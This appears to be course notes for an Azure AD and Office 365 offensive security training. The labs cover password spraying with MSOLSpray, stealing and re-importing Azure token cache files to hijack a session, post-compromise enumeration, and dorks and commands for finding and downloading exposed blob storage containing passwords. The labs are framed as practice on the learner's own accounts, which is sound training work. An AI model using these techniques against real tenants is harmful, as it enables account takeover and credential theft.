-
Source of authentication for Office 365, Azure Resource Manager, and anything else you integrate with it.
-
Powershell interaction: • MSOnline PowerShell module • Focusses on Office 365 • Some Office 365 specific features • AzureAD PowerShell module • General Azure AD • Different feature set • Azure CLI / Az powershell module • More focus on Azure Resource Manager
-
Azure AD principals • Users • Devices • Applications
-
Azure AD roles • RBAC Roles are only used for Azure Resource Manager • Office 365 uses administrator roles exclusively
-
Azure AD admin roles • Global/Company administrator can do anything • Limited administrator accounts • Application Administrator • Authentication Administrator • Exchange Administrator • Etc • Roles are fixed
-
Azure AD applications • Documentation unclear • Terminology different between documentation, APIs and Azure portal • Complex permission system • Most confusing part • Examples: • Microsoft Graph • Azure Multi-Factor Auth Client • Azure Portal • Office 365 portal • Azure ATP • A default Office 365 Azure AD has about 200 service principals (read: applications)
-
App permissions • Two types of privileges: • Delegated permissions • Require signed-in user present to utilize • Application permissions • Are assigned to the application, which can use them at any time • These privileges are assigned to the service principal • Every application defines permissions • Can be granted to Service Principals • Commonly used: • Microsoft Graph permissions • Azure AD Graph permissions
-
Azure AD Sync Account • Dump all on-premise password hashes (if PHS is enabled) • Log in on the Azure portal (since it’s a user) • Bypass conditional access policies for admin accounts • Add credentials to service principals • Modify service principals properties
If password hash sync is in use: Compromised Azure AD connect Sync account = Compromised AD
• Encryption key is encrypted with DPAPI • Decrypted version contains some blob with AES keys • Uses AES-256 in CBC mode
Anyone with control over Service Principals can assign credentials to them and potentially escalate privileges.
Anyone who can edit properties* of the AZUREADSSOACC$ account, can impersonate any user in Azure AD using Kerberos (if no MFA)
https://github.com/dafthack/MSOLSpray/MSOLSpray.ps1 Create a text file with ten (10) fake users we will spray along with your own user account ([email protected] ). (Do not spray accounts you do not own. You may use my domain “glitchcloud.com” for generating fake target users) and save as userlist.txt
Import-Module .\MSOLSpray.ps1 Invoke-MSOLSpray -UserList .\userlist.txt -Password [the password you set for your test account]
PS> Import-Module Az PS> Connect-AzAccount or PS> $credential = Get-Credential PS>Connect-AzAccount -Credential $credential
PS> mkdir C:\Temp PS> Save-AzContext -Path C:\Temp\AzureAccessToken.json PS> mkdir “C:\Temp\Live Tokens”
Connect-AzAccount
$credential = Get-Credential Connect-AzAccount -Credential $credential
Open Windows Explorer and type %USERPROFILE%.Azure\ and hit enter • Copy TokenCache.dat & AzureRmContext.json to C:\Temp\Live Tokens • Now close your authenticated PowerShell window!
Delete everything in %USERPROFILE%.azure
• Start a brand new PowerShell window and run:
PS> Import-Module Az
PS> Get-AzContext -ListAvailable
• You shouldn’t see any available contexts currently
• In your PowerShell window let’s manipulate the stolen TokenCache.dat and AzureRmContext.json files so we can import it into our PowerShell session
PS> $bytes = Get-Content "C:\Temp\Live Tokens\TokenCache.dat" -Encoding byte PS> $b64 = [Convert]::ToBase64String($bytes) PS> Add-Content "C:\Temp\Live Tokens\b64-token.txt" $b64
• Now let’s add the b64-token.txt to the AzureRmContext.json file. • Open the C:\Temp\Live Tokens folder. • Open AzureRmContext.json file in a notepad and find the line near the end of the file title “CacheData”. It should be null. • Delete the word “null” on this line • Where “null” was add two quotation marks (“”) and then paste the contents of b64-token.txt in between them. • Save this file as C:\Temp\Live Tokens\StolenToken.json • Let’s import the new token
PS> Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json’
• We are now operating in an authenticated session to Azure
PS> $context = Get-AzContext PS> $context.Account
• You can import the previously exported context (AzureAccessToken.json) the same way
• GOAL: Use the MSOnline and Az PowerShell modules to do basic enumeration of an Azure account post-compromise. • In this lab you will authenticate to Azure using your Azure AD account you setup. Then, you will import the MSOnline and Az PowerShell modules and try out some of the various modules that assist in enumerating Azure resource usage.
• Start a new PowerShell window and import both the MSOnline and Az modules PS> Import-Module MSOnline PS> Import-Module Az • Authenticate to each service with your Azure AD account: PS> Connect-AzAccount PS> Connect-MsolService • First get some basic Azure information PS> Get-MSolCompanyInformation • Some interesting items here are ◇ UsersPermissionToReadOtherUsersEnabled ◇ DirSyncServiceAccount ◇ PasswordSynchronizationEnabled ◇ Address/phone/emails • Next, we will start looking at the subscriptions associated with the account as well as look at the current context we are operating in. Look at the “Name” of the subscription and context for possible indication as to what it is associated with. PS> Get-AzSubscription PS> $context = Get-AzContext PS> $context.Name PS> $context.Account • Enumerating the roles assigned to your user will help identify what permissions you might have on the subscription as well as who to target for escalation. PS> Get-AzRoleAssignment • List out the users on the subscription. This is the equivalent of “net users /domain” in on-prem AD PS> Get-MSolUser -All PS> Get-AzAdApplication PS> Get-AzWebApp PS> Get-AzSQLServer PS> Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName PS> Get-AzSqlServerFirewallRule –ServerName $ServerName -ResourceGroupName $ResourceGroupName PS> Get-AzSqlServerActiveDirectoryAdminstrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName • The user you setup likely doesn’t have any resources currently associated with it, but these commands will help to understand the specific resources a user you gain access to has. PS> Get-AzResource PS> Get-AzResourceGroup • Choose a subscription PS> Select-AzSubscription -SubscriptionID "SubscriptionID" • There are many other functions. • Use Get-Module to list out the other Az module groups • To list out functions available within each module use the below command substituting the value of the “Name” parameter. PS> Get-Module -Name Az.Accounts | Select-Object -ExpandProperty ExportedCommands PS> Get-Module -Name MSOnline | Select-Object -ExpandProperty ExportedCommands
site:.blob.core.windows.net site:.blob.core.windows.net ext:xlsx | ext:csv "password"
python dnscan.py -d blob.core.windows.net -w subdomains-100.txt
az storage container list --connection-string ''
az storage blob list --container-name --connection-string ''
az storage blob download --container-name --name --file /tmp/ --connection-string ''